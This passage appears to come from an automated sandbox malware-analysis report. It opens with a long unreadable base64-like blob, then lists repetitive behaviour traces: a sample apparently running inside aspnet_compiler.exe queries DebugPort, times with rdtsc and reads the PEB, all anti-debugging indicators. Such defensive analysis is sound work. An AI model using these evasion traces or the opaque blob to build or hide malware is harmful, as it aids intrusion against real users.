Nei/d/rN91RVPmw0oCHM1pgQzuTAE1wrYApU4wI+srCo5AVK6jLZ/2+lcyuip6fAAAsE2Y2IQDcozktucJ02Gv7ge8YFA5mXnh7Jyriia3XCVy+DBUSOytVBOF1AjzI9IoU+ww+pd4iWJkDvTWeUCk4JI85M1nBixJqOIXSnGyad/YCbp0DdKOU+/pT7MDgGqeMUdL83i0I9vEMQ4HUvqcu2XCXn9VFMliU36VE/lDkLQ4/S4HStcdx+csR+vrO8X/+Fd6xws6/GfRZslExTRLqsictvCqCooUCqRsoENahlT4q0E5F9Gnr5OZ6dGnpKA4Zwfa6edTCVK3XI+dAsQ2vz1HUsIOQABXOVqiD7p5TOCvn7GhRqxDeaJJaBfNixQhnoAEP4E1T0CPu0Jc7MK2Z068jHfB7RV6I3Gx8BoPdBayGQK59PK+uGHAT/hT/SuhVV5Uuuwsr+KIhkDfDJnZ+jOVv1ZLViU8Tzp+u3yLSEr2J71Wd2swDbdJ6FimkHHN2gui7xfcs890on8vYPym27iasQBl2oR629pSxY8f44N9RBPR+0gyHV1r/KILzlx0xOtwC/3xk+tYkhhCJ12XuoAJ7TWOw/4OqwJR7KG9vDmFoek9ueAgr2Y1yWH1qTSXQi2n0Pg+ODMShh9v/BE/wG7auikytnTa9kfkWr54sJTrwujQ2/7BfxKiGEwwUsbHPXSK/ot2zyHz9uvquy/odASF+KTMhwtCnLKbRU0XVHUgqVC8/j1tgkcLWb4I8HmSaJH24QwbFEhx1oVRvHdkC6srvLCddcvGpY12Tszk2qHS1PsKPn7s8AWFmwH6Jg9yHJ4vbRcV+LF8ypkBXttjCM3FbibvTHIbxf9uUl0nZZCaybanri3xOAG21omOSC+wd7FUPmP0RjHMzDH73jc31dVdGPJP/9aQN6YfFBtsBoVEguwi85MoNcJEWikjCG/jTZ2KExdKfFgXVN4hmOl8ZO7fDKNIwn9rAF91G1HS9oDx7sIenTCbDbXcig+vhD59PeYHvL3AyHDkiM3mKUmr1bRUgZszs9LpGyW2fxQpPG9eX9x2oFDi7dSbmtCCUnERgkvaXfIAak0BxQmAzRD9kgTzPUMhbFuHyDLa68oh4d7jIezZr1DYPUrIe6fu+qthf5uZulZFBVL6RUO0jytnMUSsh7BPkAe4z6vYOYW0bQElI7bVTLtzPeIpMZ28P7h9pO++7nuiLwgd459wsk/oHe+xgDI5JpbznXeP1/tsCxGjCUcAfkO+nezzq1uXIp6Z+hoey9MmDM3Wzq9pll24e4imQPLD7Nq1yDDzL83lwUB96l1DbYcQLRx7+yu9mqzLl+o62bDyix9CgBsGBP+N/R3uRtkVV/SJGbfSxWP5plTa3B+v8qc599YvgOjQFyjABabREI/RSbtxU+yHeWHb4+Qi/yx4KEWWOEZlQFZUUiXgdPGLK5EOd7YQPbkrQvotL4lKRCBfsXhhrVviloM1hnxv49Wt4CdQRMYvMc5Bk8jWWka56GA6fzhKoL4bMfar7m/Z+49+/5I1c6WSVqcaMNjZX/PkXMuPbqTQRuzqyPRJkDTD1aUpRrC6MFtjtNR7NN+yvPD5dUyO+N1wt+BCuRbF8PB+N2SkeEf
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9D1C0 rdtsc 4_2_00F9D1C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00417A93 LdrLoadDll,4_2_00417A93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1C0F0 mov eax, dword ptr fs:[00000030h]4_2_00F1C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F620F0 mov ecx, dword ptr fs:[00000030h]4_2_00F620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F450E4 mov eax, dword ptr fs:[00000030h]4_2_00F450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F450E4 mov ecx, dword ptr fs:[00000030h]4_2_00F450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1A0E3 mov ecx, dword ptr fs:[00000030h]4_2_00F1A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F280E9 mov eax, dword ptr fs:[00000030h]4_2_00F280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA20DE mov eax, dword ptr fs:[00000030h]4_2_00FA20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF50D9 mov eax, dword ptr fs:[00000030h]4_2_00FF50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F490DB mov eax, dword ptr fs:[00000030h]4_2_00F490DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov ecx, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov ecx, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov ecx, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov ecx, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F370C0 mov eax, dword ptr fs:[00000030h]4_2_00F370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9D0C0 mov eax, dword ptr fs:[00000030h]4_2_00F9D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9D0C0 mov eax, dword ptr fs:[00000030h]4_2_00F9D0C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE60B8 mov eax, dword ptr fs:[00000030h]4_2_00FE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE60B8 mov ecx, dword ptr fs:[00000030h]4_2_00FE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F25096 mov eax, dword ptr fs:[00000030h]4_2_00F25096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4D090 mov eax, dword ptr fs:[00000030h]4_2_00F4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4D090 mov eax, dword ptr fs:[00000030h]4_2_00F4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F5909C mov eax, dword ptr fs:[00000030h]4_2_00F5909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F2208A mov eax, dword ptr fs:[00000030h]4_2_00F2208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1D08D mov eax, dword ptr fs:[00000030h]4_2_00F1D08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov ecx, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F31070 mov eax, dword ptr fs:[00000030h]4_2_00F31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4C073 mov eax, dword ptr fs:[00000030h]4_2_00F4C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9D070 mov ecx, dword ptr fs:[00000030h]4_2_00F9D070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF5060 mov eax, dword ptr fs:[00000030h]4_2_00FF5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F22050 mov eax, dword ptr fs:[00000030h]4_2_00F22050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FC705E mov ebx, dword ptr fs:[00000030h]4_2_00FC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FC705E mov eax, dword ptr fs:[00000030h]4_2_00FC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F4B052 mov eax, dword ptr fs:[00000030h]4_2_00F4B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE903E mov eax, dword ptr fs:[00000030h]4_2_00FE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE903E mov eax, dword ptr fs:[00000030h]4_2_00FE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE903E mov eax, dword ptr fs:[00000030h]4_2_00FE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE903E mov eax, dword ptr fs:[00000030h]4_2_00FE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1A020 mov eax, dword ptr fs:[00000030h]4_2_00F1A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1C020 mov eax, dword ptr fs:[00000030h]4_2_00F1C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3E016 mov eax, dword ptr fs:[00000030h]4_2_00F3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3E016 mov eax, dword ptr fs:[00000030h]4_2_00F3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3E016 mov eax, dword ptr fs:[00000030h]4_2_00F3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3E016 mov eax, dword ptr fs:[00000030h]4_2_00F3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F501F8 mov eax, dword ptr fs:[00000030h]4_2_00F501F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF61E5 mov eax, dword ptr fs:[00000030h]4_2_00FF61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F451EF mov eax, dword ptr fs:[00000030h]4_2_00F451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F251ED mov eax, dword ptr fs:[00000030h]4_2_00F251ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F5D1D0 mov eax, dword ptr fs:[00000030h]4_2_00F5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F5D1D0 mov ecx, dword ptr fs:[00000030h]4_2_00F5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9E1D0 mov ecx, dword ptr fs:[00000030h]4_2_00F9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F9E1D0 mov eax, dword ptr fs:[00000030h]4_2_00F9E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF51CB mov eax, dword ptr fs:[00000030h]4_2_00FF51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE61C3 mov eax, dword ptr fs:[00000030h]4_2_00FE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FE61C3 mov eax, dword ptr fs:[00000030h]4_2_00FE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F3B1B0 mov eax, dword ptr fs:[00000030h]4_2_00F3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD11A4 mov eax, dword ptr fs:[00000030h]4_2_00FD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD11A4 mov eax, dword ptr fs:[00000030h]4_2_00FD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD11A4 mov eax, dword ptr fs:[00000030h]4_2_00FD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FD11A4 mov eax, dword ptr fs:[00000030h]4_2_00FD11A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA019F mov eax, dword ptr fs:[00000030h]4_2_00FA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA019F mov eax, dword ptr fs:[00000030h]4_2_00FA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA019F mov eax, dword ptr fs:[00000030h]4_2_00FA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FA019F mov eax, dword ptr fs:[00000030h]4_2_00FA019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1A197 mov eax, dword ptr fs:[00000030h]4_2_00F1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1A197 mov eax, dword ptr fs:[00000030h]4_2_00F1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1A197 mov eax, dword ptr fs:[00000030h]4_2_00F1A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F77190 mov eax, dword ptr fs:[00000030h]4_2_00F77190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F60185 mov eax, dword ptr fs:[00000030h]4_2_00F60185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FDC188 mov eax, dword ptr fs:[00000030h]4_2_00FDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FDC188 mov eax, dword ptr fs:[00000030h]4_2_00FDC188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FB9179 mov eax, dword ptr fs:[00000030h]4_2_00FB9179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1F172 mov eax, dword ptr fs:[00000030h]4_2_00F1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F27152 mov eax, dword ptr fs:[00000030h]4_2_00F27152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F26154 mov eax, dword ptr fs:[00000030h]4_2_00F26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F26154 mov eax, dword ptr fs:[00000030h]4_2_00F26154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1C156 mov eax, dword ptr fs:[00000030h]4_2_00F1C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF5152 mov eax, dword ptr fs:[00000030h]4_2_00FF5152
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F19148 mov eax, dword ptr fs:[00000030h]4_2_00F19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F19148 mov eax, dword ptr fs:[00000030h]4_2_00F19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F19148 mov eax, dword ptr fs:[00000030h]4_2_00F19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F19148 mov eax, dword ptr fs:[00000030h]4_2_00F19148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FB4144 mov eax, dword ptr fs:[00000030h]4_2_00FB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FB4144 mov eax, dword ptr fs:[00000030h]4_2_00FB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FB4144 mov ecx, dword ptr fs:[00000030h]4_2_00FB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FB4144 mov eax, dword ptr fs:[00000030h]4_2_00FB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FB4144 mov eax, dword ptr fs:[00000030h]4_2_00FB4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F21131 mov eax, dword ptr fs:[00000030h]4_2_00F21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F21131 mov eax, dword ptr fs:[00000030h]4_2_00F21131
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1B136 mov eax, dword ptr fs:[00000030h]4_2_00F1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1B136 mov eax, dword ptr fs:[00000030h]4_2_00F1B136
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F1B136 mov eax, dword ptr fs:[00000030h]4_2_00F1B136
